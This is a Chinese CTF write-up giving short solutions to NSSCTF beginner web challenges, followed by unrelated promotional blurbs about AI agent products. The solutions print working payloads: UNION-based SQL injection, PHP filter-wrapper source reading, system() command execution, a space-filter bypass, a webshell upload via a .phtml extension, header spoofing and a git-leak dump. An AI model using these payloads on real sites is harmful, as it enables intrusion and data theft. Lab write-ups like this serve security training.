NSSCTF Web 第一页

NSSCTF Web 第一页

[SWPUCTF 2021 新生赛]gift_F12

点击确定

查看源码

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[SWPUCTF 2021 新生赛]jicao

get:json={"x":"wllm"}        post:id=wllmNB

NSSCTF{47e0e900-250c-40d2-8ccf-2fef864d242a}

[SWPUCTF 2021 新生赛]easy_md5

md5弱比较绕过:314282422、571579406

NSSCTF{9668d690-7b6d-42a0-8c20-205dd6b5dc7f}

[SWPUCTF 2021 新生赛]include

/?file=flag.php

伪协议读源码:php://filter/read=convert.base64-encode/resource=flag.php

b64解密得:

<?php
$flag='NSSCTF{d44702c1-094b-489a-a0ab-50471944f73d}';

[SWPUCTF 2021 新生赛]easy_sql

字符型单引号。判断列数:/?wllm=-1' order by 4--+

/?wllm=-1' order by 3--+

共3列

查看回显位:/?wllm=-1' union select 1,2,3--+

回显位 2,3

查库:/?wllm=-1' union select 1,2,database()--+

库 test_db

查表:/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"--+

表 test_tb,users

查test_tb表的所有字段:/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="test_db" and table_name="test_tb"--+

所有字段 id,flag

查看flag字段的内容:/?wllm=-1' union select 1,2,flag from test_tb--+

NSSCTF{e2e3e44f-3751-4545-b48f-4c41818fa887}

[LitCTF 2023]我Flag呢?

查看源码

NSSCTF{cd21a6ec-88cb-46cd-b40f-1d0baa9b785f}

[SWPUCTF 2021 新生赛]easyrce

/?url=echo(system("ls /"));

/?url=echo(system("cat /flllllaaaaaaggggggg"));

NSSCTF{80867aa5-b8f8-4ebb-bbe8-d38fb3b5206f}

[SWPUCTF 2021 新生赛]caidao

wllm=system("cat /flag");

NSSCTF{c30de7d3-4048-4037-8bf6-265e61bdc95a}

[SWPUCTF 2021 新生赛]Do_you_know_http

bp抓包,将UA内容改为:WLLM

要求本地,X-Forwarded-For: 127.0.0.1

NSSCTF{6207b742-51ff-42e3-a012-aede36925162}

[SWPUCTF 2021 新生赛]babyrce

按要求传值

访问rasalghul.php

只过滤了空格,用$IFS$1绕过:/rasalghul.php?url=cat$IFS$1/flllllaaaaaaggggggg

NSSCTF{571f2fa9-f820-4245-9f42-c08d6061d016}

[第五空间 2021]WebFTP

标题中提示了git泄露

用工具下载泄漏文件:python githack.py http://node7.anna.nssctf.cn:26492/.git/

打开下载完的文件夹,发现是空的。目录扫描:

访问phpinfo.php

NSSCTF{d7c12238-0701-467f-9ca8-d0a4971e903f}

[SWPUCTF 2021 新生赛]ez_unserialize

查看源码

访问robots.txt

访问cl45s.php

poc:

<?php class wllm{ public $admin="admin"; public $passwd="ctf"; } echo serialize(new wllm());

payload:/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

NSSCTF{01336073-5e78-4911-a3ee-f7dcbf4846d3}

[SWPUCTF 2021 新生赛]easyupload2.0

只过滤了php后缀,用phtml代替即可。上传小马后,进行命令执行:cmd=system("env");

NSSCTF{cff7743d-5e0e-47f5-a56f-f28896e96f7b}

[LitCTF 2023]导弹迷踪

前端源码中没有信息,查看网络:

在game.js中发现flag:NSSCTF{y0u_w1n_th1s_!!!}

[LitCTF 2023]PHP是世界上最好的语言!!

输入php代码并执行

<?php system("cat /flag");?>

NSSCTF{cb2166a8-18d3-4c03-83eb-1fbe47d1b2b7}

Read more

我用百度智能云跑OpenClaw,AI帮我24小时盯盘、找黑马

OpenClaw(也就是Clawdbot)爆火,成为2026年现象级AI应用,被业界认为是Agent今后的主要发展方向。简单来说,它是一个能够自己操作电脑干活的智能体,你只需要通过聊天工具给他发指令,它就会自动规划和执行任务。 一位博主给了OpenClaw 50美元,让它自生自灭,结果AI通过高频捕捉套利机会,在交易当中获利,仅48小时之内将50美元滚到了2980美元。 这个案例给了我启发:何不让OpenClaw来帮我赚钱,给他操盘思路,复现一个AI炒股大神,并且让大多数人都能轻松抄作业。 于是我开始尝试,首先要搞定OpenClaw的部署,我推荐使用云主机的部署方式,国内各家科技公司都提供了OpenClaw接入服务,下面以百度智能云为例,简单说下部署的过程。 01 百度智能云:轻松部署,极简交互 打开百度智能云官网,现在每天开放 500 个名额,可以一分钱开通,快抢福利吧: https://cloud.baidu.com/product/BCC/moltbot.html 确认订单、完成支付后,就可以准备安装和配置了。

WorkBuddy 安装使用完全指南:腾讯版“小龙虾“,一句话让 AI 替你干活

不用部署云服务器,不用写代码,下载安装即可使用。WorkBuddy 是腾讯推出的 AI 原生桌面智能体工作台,让"一句话完成复杂办公任务"真正成为现实。 一、WorkBuddy 是什么? 1.1 一句话定义 WorkBuddy 是腾讯云推出的 AI 原生桌面智能体(Desktop AI Agent)工作台,基于腾讯 CodeBuddy 同源架构构建。它不是一个只会聊天的对话框,而是一个能听懂人话、自主思考、直接操作你电脑上文件的 AI 同事。 你只需用自然语言描述需求,WorkBuddy 就能自动规划、拆解、执行多步骤任务,直接交付可验收的成果——Excel 报表、PPT 演示文稿、调研报告、数据分析图表,应有尽有。 1.2

解放双手!用Windows搭建闲鱼0成本“赚米神器”!AI客服秒回复!

解放双手!用Windows搭建闲鱼0成本“赚米神器”!AI客服秒回复!

前言 在闲鱼上,卖家每天都要面对大量的私信和订单,如果手动回复,既费时间又容易出错。想象一下,如果有一套 AI 自动回复系统,能够帮你 自动处理买家消息、快速响应订单,你只需要动动手指,就能轻松管理闲鱼店铺,该有多爽!更棒的是,这套系统 完全零成本、无需服务器,只要一台 Windows 电脑,就能快速部署运行。本文将 手把手教你在 Windows 上搭建闲鱼 AI 自动回复系统,让你 轻松解放双手、提高效率,即刻开始自动化管理闲鱼店铺吧! 1 闲鱼自动回复系统介绍 闲鱼自动回复管理系统 是一个基于 Docker 部署的自动化工具,能够帮助闲鱼卖家实现消息的智能化回复和订单管理,大幅度减少手动操作的工作量。 核心功能说明自动化消息回复对闲鱼买家的消息进行自动回复,支持关键词触发和 AI 智能对话。可集成大语言模型(如通义千问)实现自然语言交流。多账号管理支持添加和管理多个闲鱼账号。账号间数据相互隔离,

OpenClaw WebSocket Channel开发实战:从零打造自定义 AI 通信通道

OpenClaw WebSocket Channel开发实战:从零打造自定义 AI 通信通道

🎯 项目背景 为什么做这个项目? 最近 OpenClaw 特别火🔥,这是一个强大的个人 AI 助手网关,支持接入 WhatsApp、Telegram、Discord 等 15+ 个消息平台。作为一个技术爱好者,我决定深入学习一下它的架构设计。 学习目标: * ✅ 理解多通道 AI 网关的架构模式 * ✅ 掌握 OpenClaw 插件化开发技能 * ✅ 实践 WebSocket 实时双向通信 * ✅ 为社区贡献一个实用的教学案例 项目定位:这不是一个生产级项目,而是一个学习性质的教学案例,帮助其他开发者快速上手 OpenClaw 插件开发。 技术栈 前端层:Vue 3 + WebSocket ↓ 服务端:Python + aiohttp + uv ↓ 通道层:Node.js + ws + OpenClaw Plugin SDK